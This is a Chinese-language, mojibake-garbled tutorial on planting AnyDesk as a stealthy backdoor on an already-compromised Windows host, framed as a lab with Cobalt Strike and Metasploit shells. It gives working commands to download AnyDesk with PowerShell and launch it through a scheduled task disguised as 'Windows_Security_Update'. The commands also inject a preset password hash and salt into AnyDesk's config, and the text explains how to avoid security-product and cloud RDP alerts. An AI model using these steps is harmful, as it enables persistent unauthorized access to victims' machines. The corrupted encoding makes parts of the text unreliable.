u=2777606168,97769377&fm=253&fmt=auto&app=138&f=JPEG.jpeg

anydesk是類似teamviewer的遠(yuǎn)程管理軟件，但是他不用安裝且體積小

【學(xué)習(xí)攻略】

使用場(chǎng)景

• 有云鎖，護(hù)衛(wèi)神等禁止3389登錄時(shí)
• 類似阿里云這種，登錄3389會(huì)報(bào)警
• 目標(biāo)機(jī)器必須可以出網(wǎng)

注意事項(xiàng)

• 啟動(dòng)anydesk的權(quán)限需要桌面用戶權(quán)限，比如，IIS做中間件的環(huán)境中，拿到了webshell一般都是沒(méi)有桌面用戶權(quán)限的，如果啟動(dòng)anydesk不會(huì)成功
• 啟動(dòng)anydesk時(shí)桌面不能被注銷
• 有可能連接上去是黑屏，這個(gè)是因?yàn)樵撟烂嬗脩敉顺鲞h(yuǎn)程桌面但沒(méi)有注銷，此時(shí)，除非能用winlogon啟動(dòng)anydesk，否則沒(méi)法使用屏幕

攻擊

Windows

假使我們?cè)趙indows上拿到目標(biāo)的shell，為了方便模擬就上線了一個(gè)cs的shell

在這里插入圖片描述

然后我們可以通過(guò)命令讓目標(biāo)下載anydesk

powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")

其實(shí)最好不要保存在c盤(pán)下，因?yàn)橛蛴脩魶](méi)有足夠的權(quán)限，所以最好是找到域用戶有寫(xiě)權(quán)限的文件夾

可以看到我們已經(jīng)將文件下載了下來(lái)(由于是模擬環(huán)境就隨便點(diǎn)，真實(shí)環(huán)境下別下載到桌面)

在這里插入圖片描述

但是不著急執(zhí)行，原因是我們不知道目標(biāo)的憑證，自然無(wú)法連接

打開(kāi)自己本機(jī)的anydesk，會(huì)彈出一個(gè)窗口

在這里插入圖片描述

可以發(fā)現(xiàn)，anydesk連接的方式并非是局域網(wǎng)，而是通過(guò)互聯(lián)網(wǎng)，一斷網(wǎng)就無(wú)法使用

在這里插入圖片描述

首先我們要記住自己的ID號(hào)

在這里插入圖片描述

• 819784857

然后設(shè)置訪問(wèn)密碼

在這里插入圖片描述

隨便設(shè)置，自己知道就行了

在這里插入圖片描述

生成的配置文件將會(huì)儲(chǔ)存在

C:\Users\你的用戶名\AppData\Roaming\AnyDesk

在這里插入圖片描述

然后將四個(gè)文件保存下來(lái)，然后上傳到目標(biāo)的主機(jī)，上傳完后把此處的配置文件全部刪除，目的是讓anydesk生成一個(gè)新的配置

由于我們還沒(méi)有在目標(biāo)主機(jī)打開(kāi)過(guò)anydesk，所以要自己新建一個(gè)AnyDesk文件夾，然后將文件復(fù)制進(jìn)去

在這里插入圖片描述

這幾步不是必須，按需操作

連接前可以設(shè)置連接的用戶名，如果不設(shè)置，就會(huì)用當(dāng)前的用戶名

在這里插入圖片描述

有可能會(huì)暴露身份

在這里插入圖片描述

在這里插入圖片描述

輸入剛才設(shè)置的密碼

在這里插入圖片描述

在這里插入圖片描述

Linux

假使我們只能通過(guò)linux拿到目標(biāo)的shell，就無(wú)法像之前那樣通過(guò)生成配置文件然后拷貝過(guò)去，所以我們就只能對(duì)配置文件進(jìn)行修改

為了方便模擬我上線了一個(gè)msf的shell

首先我們要讓目標(biāo)下載anydesk，方法和之前一樣

powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")

下載完后我們要讓其啟動(dòng)，可以直接執(zhí)行，如果無(wú)法直接執(zhí)行，可以使用計(jì)劃任務(wù)執(zhí)行，如果要使用計(jì)劃任務(wù)，首先要知道當(dāng)前用戶是誰(shuí)

powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]

在這里插入圖片描述

確認(rèn)好用戶后就可以創(chuàng)建計(jì)劃任務(wù)

schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU Administrator

然后執(zhí)行計(jì)劃任務(wù)

schtasks /run /tn Windows_Security_Update

等過(guò)了幾秒后，anydesk連接上服務(wù)器后再把進(jìn)程殺死

tasklist
taskkill /f /pid 2692

在這里插入圖片描述

然后再添加密碼到配置文件中(密碼為AnyDeskGetAccess)

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.conf

查看目標(biāo)的ID

type C:\Users\用戶名\AppData\Roaming\AnyDesk\system.conf

在這里插入圖片描述

然后讓目標(biāo)機(jī)器運(yùn)行anydesk，在連接即可

點(diǎn)擊查看【網(wǎng)絡(luò)安全學(xué)習(xí)資料·攻略】